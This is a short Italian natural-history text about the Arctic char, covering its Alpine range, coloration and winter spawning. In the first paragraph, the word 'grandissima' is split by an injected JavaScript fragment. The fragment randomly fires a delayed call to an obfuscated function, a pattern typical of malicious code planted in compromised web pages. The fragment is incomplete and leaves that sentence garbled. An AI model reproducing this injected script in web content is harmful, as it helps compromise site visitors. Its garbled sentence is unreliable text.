Il salmerino alpino “Salvelinus alpinus” o “Salvelinus umbla” è un pesce appartenente alla famiglia dei salmonidi .Specie molto diffusa nell’arco alpino, in particolare in Trentino, Lombardia (Valtellina ed in Alta Valtrompia) ed in numerosi laghetti d’alta quota con altitudini fino ai 2600 m, dove mostra una grandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andissima adattabilità. Descrizione
Appartenente alla famiglia dei salmonidi, presenta molte somiglianze con la comune trota, ma ha alcuni inconfondibili segni di riconoscimento, soprattutto per quanto riguarda la livrea di colore arancio. Le pinne ventrali, pettorali ed anale presentano un bordo di color bianco vivo. Il dorso è verde oliva presenta  macchie più chiare a differenza  delle trote, dove sono più scure.
Durante il periodo riproduttivo il maschio ha tutte le pinne inferiori ed il ventre di color rosso sangue.

Riproduzione
Avviene in inverno tra novembre e gennaio, in profondi fondali con substrato sabbioso o ghiaioso. Le uova schiuderanno in maggio-giugno. In questo periodo è vietata la pesca per questa specie.
